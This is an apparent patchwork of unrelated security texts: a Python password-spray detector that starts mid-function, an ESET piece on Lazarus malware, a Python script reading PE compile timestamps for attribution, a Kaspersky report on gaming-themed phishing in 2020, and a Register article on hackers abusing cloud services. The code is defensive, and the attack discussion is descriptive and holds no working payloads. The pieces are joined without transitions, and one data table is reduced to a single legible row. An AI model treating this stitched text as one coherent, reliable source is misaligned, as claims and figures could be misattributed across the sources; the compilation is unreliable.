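            (datetime.fromisoformat(ev["time"]), ev["target"]))

    alerts = []
    for source, attempts in by_source.items():
        attempts.sort()
        best = None  # densest window seen for this source
        start = 0
        for end in range(len(attempts)):
            # advance `start` until attempts[start..end] fit in the window
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            span = attempts[start:end + 1]
            if best is None or len(span) > len(best):
                best = span
        accounts = {target for _, target in best}
        if len(best) >= min_failures and len(accounts) >= min_accounts:
            alerts.append({"source": source,
                           "first_seen": best[0][0].isoformat(),
                           "failures": len(best),
                           "distinct_accounts": len(accounts)})
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(SAMPLE_EVENTS):
        print(alert)
```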
To avoid Windows security features blocking their malware, Lazarus also signed their code using a certificate first issued to 16:20 Software LLC, an American firm said by ESET to have been incorporated in May 2010.
Among other clues linking the malware’s components back to North Korea, Boutin said his team had seen build timestamps “added by the compiler showing when the executable was compiled” which neatly cross-referenced with normal office hours for East Asia. Corroborating that were some “host fingerprinting” techniques which uncovered various digital fragments “similar to backdoors the Lazarus Group is known to use,” as Boutin put it.
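As an added example of the build-timestamp check Boutin describes (not ESET’s tooling), this reads the TimeDateStamp from a PE file’s COFF header and asks whether it falls in working hours for a given UTC offset. The PE bytes are a constructed minimal header and the 09:00–18:00 weekday window is an assumption.

```python
import struct
from datetime import datetime, timezone, timedelta

PE_SIGNATURE_OFFSET = 0x3C  # e_lfanew field in the DOS header
# COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
# NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes)
COFF_HEADER = struct.Struct("<HHIIIHH")


def compile_time(pe_bytes):
    """Return the COFF TimeDateStamp of a PE image as a UTC datetime.
    The stamp is written by the linker and can be zeroed or forged, so it is
    one clue to weigh with others (as ESET did), never proof on its own."""
    if pe_bytes[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    (e_lfanew,) = struct.unpack_from("<I", pe_bytes, PE_SIGNATURE_OFFSET)
    if pe_bytes[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    stamp = COFF_HEADER.unpack_from(pe_bytes, e_lfanew + 4)[2]
    if stamp == 0:
        raise ValueError("TimeDateStamp is zero (stripped or reproducible build)")
    return datetime.fromtimestamp(stamp, tz=timezone.utc)


def local_hour(when_utc, utc_offset_hours):
    """Hour of day once the stamp is shifted into a suspected developer timezone."""
    return (when_utc + timedelta(hours=utc_offset_hours)).hour


def in_office_hours(when_utc, utc_offset_hours, start=9, end=18):
    """True when the shifted time lands on a weekday inside [start, end).
    The window itself is an assumption for this example."""
    local = when_utc + timedelta(hours=utc_offset_hours)
    return local.weekday() < 5 and start <= local.hour < end


def build_sample_pe(stamp_utc):
    """Constructed minimal PE: DOS header, e_lfanew -> 'PE\\0\\0', COFF header."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, PE_SIGNATURE_OFFSET, 64)
    coff = COFF_HEADER.pack(0x8664, 1, int(stamp_utc.timestamp()), 0, 0, 0, 0x22)
    return bytes(dos) + b"PE\0\0" + coff


# A Tuesday, 02:30 UTC: night in Europe and the Americas, late morning at UTC+9.
SAMPLE_PE = build_sample_pe(datetime(2019, 11, 12, 2, 30, tzinfo=timezone.utc))

if __name__ == "__main__":
    stamp = compile_time(SAMPLE_PE)
    for label, offset in (("UTC+9", 9), ("UTC+1", 1), ("UTC-5", -5)):
        print(label, local_hour(stamp, offset), in_office_hours(stamp, offset))
```

Run over a corpus of samples, the distribution of local hours for a candidate offset is far more telling than any single stamp.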
What made the lure so sneaky was the fact it was targeting potential jobseekers looking to leave their current employer, a fact that Boutin speculated may have made some victims less likely to report it to their current employer’s cybersecurity teams.
Thanks to the coronavirus pandemic, the role of the Internet in our lives has undergone changes, including irreversible ones. Some of these changes are definitely for the better, some are not very good, but almost all of them in some way affect digital security issues.
We decided to take a closer look at the changes around us through the prism of information security, starting with the video game industry.
The daily number of blocked attempts to visit malicious gaming-related websites, or to browse to such sites from gaming-related websites (or forums), increased by 54% in April compared to January of this year. In May, we saw a downward trend in this indicator: -18% compared to April.
The number of blocked attempts to visit phishing sites that exploit online gaming topics has increased. In particular, the number of notifications from fake Steam gaming platform sites increased by 40% from February to April.
Attackers most often use Minecraft, Counter-Strike: Global Offensive and The Witcher 3: Wild Hunt as lures.
The users most targeted by such attacks are from Vietnam (7.9%), Algeria (6.6%), Korea (6.2%), Hungary (6.2%) and Romania (6%).
I play until the boss sees
Figures from various sources show that the pandemic has led to a sharp increase in player activity. In March, according to gamesindustry.biz, sales of games, both computer and console, increased significantly.
Growth in game sales in the week of March 16-22. Source: gamesindustry.biz
In April, the number of downloads, as well as the number of simultaneous online players, of Steam reached record levels. The Steam user activity graph (both in-game and just installing the client) (Steam Database) shows the peak of activity on April 4. After that, activity started to decline, but only slowly. Moreover, the activity graphs of the players are noticeably different from the usual ones – periods of inactivity are less pronounced than in ordinary pre-quarantine days, and the peaks last longer.
The number of Steam users per day. Source: steamdb.info
All these stats are totally understandable. First, people have more free time for games. Statistics collected by Nielsen Games as part of their regular survey of gamers confirm this thesis:
The increase in the amount of time spent playing video games by players in different countries. Source: Hollywood Reporter
Second, apparently not all people who wanted to spend time playing video games had a computer at home that would let them do it. That is what the hardware statistics displayed on the Steam site suggest.
If you look closely at the graphs showing which video cards Steam users have, you can see a clear change in March 2020 in lines that had been completely flat before. Until then, the proportions of Nvidia, Intel and AMD video cards had remained at the same level relative to each other. Since the beginning of quarantine, the share of Intel and AMD video cards has grown quite noticeably. This growth was within 2%, which might seem insignificant until you remember that there are more than 20 million Steam users. That is, the additional number of devices with Intel and AMD graphics cards amounted to hundreds of thousands of computers. Given the specifics of video cards from different manufacturers, we can safely assume that these hundreds of thousands of devices are office laptops that arrived at home during quarantine, and that people installed Steam on them while the boss wasn’t able to see it anyway.
This is also confirmed by the sudden shift in the graphs showing the ratio of Intel and AMD processors (Intel also grew from the beginning of quarantine), and in the graphs of the processors used by players by number of cores (atypical growth in this proportion was shown by 4-core and 2-core processors).
Let’s play with the bad guys?
The increase in the number of players and the time they spend in games, of course, did not go unnoticed by cybercriminals. Gamers have long been the target of attacks by bad guys, who are mainly interested in logins and passwords for game accounts. Now, with the connection of work computers to home networks, and, conversely, with the entry of home devices into work networks that are often poorly prepared for this, attacks on players are becoming not only a way to get to an individual user’s wallet, but also a way to access the corporate infrastructure.
In the first five months of 2020, the number of vulnerabilities discovered on Steam has already exceeded the number of vulnerabilities discovered in any of the previous years. This fact, among other things, indicates a growing interest in finding such vulnerabilities.
We shouldn’t forget also that at the end of April 2020, Valve confirmed the leak of the source code of the popular network games CS: GO and Team Fortress 2. Attackers are most probably already trying to parse their code in search of vulnerabilities that can be used for their own purposes. It is important to understand that these are not offline games, but online games that need a constant connection to game servers and frequent updates. This makes their users even more vulnerable, because their devices are obviously always online, and players are always ready to install an “update” so as not to lose the ability to play.
But even without technically complex attacks using zero-day vulnerabilities, attackers have a large field for their activities. Realizing that the gaming industry is experiencing an unexpected increase in the number of players, they have stepped up attacks that exploit the gaming theme in one way or another.
The logical step on the part of the attackers was to increase the number of phishing attacks. This is confirmed by Kaspersky AntiPhishing and the Kaspersky Security Network (KSN). Compared with February, the number of hits on the thousand most popular phishing sites containing the word “Steam” in the name has significantly increased. These detections peaked in April.
An increase in the number of hits on phishing Steam-related topics relative to February 2020. Source: Kaspersky Security Network
There is a clear increase in the statistics of web antivirus detections of sites with names exploiting the game theme as a whole, for example, containing the names of popular video games and gaming platforms.
The number of web attacks using game subjects during the period from January to May 2020. Source: KSN
A wide variety of malicious programs are spread with such malicious links: from password stealing malware to ransomware and miners. As always, they fake free versions, updates or extensions for popular games, as well as cheat programs. A similar picture is observed among malicious files that use game-related names to stay unnoticed.
Local threats that use game-related themes as a cover. Table columns: verdict, % of all attacks. Only one row is legible: HEUR:Trojan.Multi.StartPage.b
The statistics do not take into account the Hacktool category of threats – tools that are usually installed by the users themselves but can be used for malicious purposes. We include remote access clients, traffic analyzers, etc. in this category. This category is of interest here because modern cheat programs often use the same techniques as malware, such as memory injection and exploiting vulnerabilities to bypass protection. If we add this kind of detection to the statistics, it will take first place with a share of 10%.
Judging by the statistics obtained from our web antivirus, attackers most often use Minecraft as a lure. The Witcher 3: Wild Hunt also makes the TOP 3 of the most exploited games, its popularity having grown sharply thanks to the series based on the novels by Andrzej Sapkowski.
The number of attacks using the theme of an online game, January-May 2020. Source: KSN
Following the dynamics of detections on links containing the names of the games, we came to the conclusion that from April to early May the attackers conducted a campaign in which they used several games at once. In particular, Overwatch and PlayerUnknown’s Battlegrounds appeared on our radar. If you look closely at the graph, you can see many parallel peaks. Before and after the indicated period, this trend does not persist.
Web attacks using the themes of Overwatch and PUBG, January-May 2020. Source: KSN
Users in Vietnam are most susceptible to attacks using game-related topics: almost 8% of all web antivirus detections in this country occurred on sites whose names used the theme of games.
TOP 20 countries by the proportion of blocked attempts to enter malicious sites using the theme of online games, January-May 2020 (percentage of attacked users). Source: KSN
Following Vietnam, the TOP 5 countries for this parameter include Algeria, Korea, Hungary and Romania. In general, the TOP 20 includes many countries in North Africa, Asia and Europe, especially Southern and Eastern Europe.
Tens of millions of people who find themselves isolated at home (combined with plenty of free time) have given a serious boost to the gaming industry. Of course, the attackers could not help but take advantage of this situation, and we have seen an impressive increase in attempts to visit phishing sites that exploit gaming topics.
However, we should keep in mind that this was facilitated not only by the efforts of attackers, but also by the careless actions of the users themselves, who fell for fake emails apparently sent on behalf of game services, or who were looking for hacked versions of some popular games and cheat programs for others.
Unfortunately, in most cases, cybercriminals do not need technologically sophisticated schemes to carry out successful attacks. It is enough to use relevant topics, one of which in the spring of 2020 was video games.
Infosec pros and hackers regularly abuse cloud service providers to conduct reconnaissance and attacks, despite efforts by cloud providers to limit such activity.
In a recent research paper titled “Cloud as an Attack Platform” [PDF], five boffins from Texas Tech University – Moitrayee Chatterjee, Prerit Datta, Faranak Abri, Akbar Siami-Namin, and Keith Jones – describe a series of interviews they conducted with computer security pros attending the Black Hat and DEF CON conferences.
Of the 75 security professionals and hackers they spoke with as a part of a larger examination of attacker psychology, more than 93 per cent admitted to abusing cloud services to create attack environments and launch attacks.
“We observed that these professional hackers often employ common strategies to abuse the cloud platform for its resource-efficient features in order to remain stealthy and silent while probing target machines, collecting victim data, discovering vulnerabilities, and launching attacks,” the paper explains.
“We did not collect any demographic data, so we can not tell apart an ethical hacker/pen-tester or malicious hackers,” said Chatterjee, a doctoral candidate and corresponding author, in an email to The Register. “Moreover, at conferences like DEF CON, participants do not get a name tag, we all got a tag that says ‘human.’”
Chatterjee said recruiting participants to answer questions was difficult because they were afraid of being subject to a social engineering attack. “Some of them even thought we were stealing biometric data when we offered them a pen to scribble down their thoughts using some diagram,” she said.
Those using cloud services for offensive operations, the researchers say, follow a common pattern. They set up a Virtual Private Server (VPS) or a multi-hop Virtual Private Network (VPN) to communicate securely with virtual machines (VMs), and load the VMs with security tools such as Nmap, Metasploit, and Wireshark so they can conduct offensive operations.
Though infrastructure-as-a-service providers try to avoid this through VM network quotas, or tools to secure accounts like AWS GuardDuty and Amazon Inspector, infosec pros can work around platform limitations.
Chatterjee said the interviewees mostly mentioned AWS, but added that Google Cloud Platform abuse has been documented too. These companies, she said, are aware that abuse happens but they don’t sufficiently monitor basic accounts to stop it.
The Register asked AWS and Google for comment. A Google spokesperson pointed to the company’s acceptable use policy for GCP. AWS did not respond but has a similar policy.
Staying under the radar
The boffins identified several common attack scenarios in a companion paper, “Launching Stealth Attacks using Cloud” [PDF].
It outlines attack scenarios like using cloud platforms for phishing, DDoS, password cracking, rogue services, and other operations like running command-and-control servers. It also covers setting up an example attack server using Oracle VirtualBox and Kali Linux.
Both papers are scheduled to appear at the IEEE Computer Society Signature Conference on Computers, Software and Application (COMPSAC 2020) in July.
The researchers suggest some ways cloud providers might deal with abuse more effectively. One involves better customer identity verification through background checks. The availability of websites offering fake credit card numbers, the researchers say, makes it easy to create cloud accounts anonymously.
They also suggest better tracking of network usage and more intelligent VM monitoring to detect suspicious accounts. Cloud providers, they say, can enforce the use of firewalls, encourage software updates on VMs to protect against vulnerabilities, and create trusted software repositories to limit the availability of attack tools on their platforms.
Such measures, however, would impose costs on cloud providers and might alienate customers if the oversight is too heavy-handed.
Akbar Siami-Namin, associate professor of computer science at Texas Tech University and a co-author of the two papers, told The Reg there are both technical and business challenges cloud providers need to deal with.
“Security and particularly the addition of security controls to infrastructure means additional costs,” he said. “It also negatively impacts the ‘usability’ of the underlying systems. In the cloud platform, since it is a distributed environment, it is super hard to define a solid fortress in order to prevent adversaries from abusing it.”
He also pointed to the business challenges entailed by adding friction to the customer acquisition process.
“Individuals are less likely to try something on the cloud, if the cloud is asking for so much private information such as credit card, name, address, etc,” he said. “Therefore, the cloud providers offer some sort of basic computation power as ‘free’ with the hope that the potential customers (individuals) become regular customers for their cloud platforms (a long range investment).”
Those who would abuse cloud systems, he said, take advantage of this goodwill gesture.
“The cloud providers are aware of this issue,” Siami-Namin said. “However, from a technical point of view, it is hard to make the system bullet-proof and protected from attacks and abuse. As pointed out in our papers, perhaps they need a more mature, resilient, and monitoring tracking system empowered with AI and automated detection to identify these abuses.”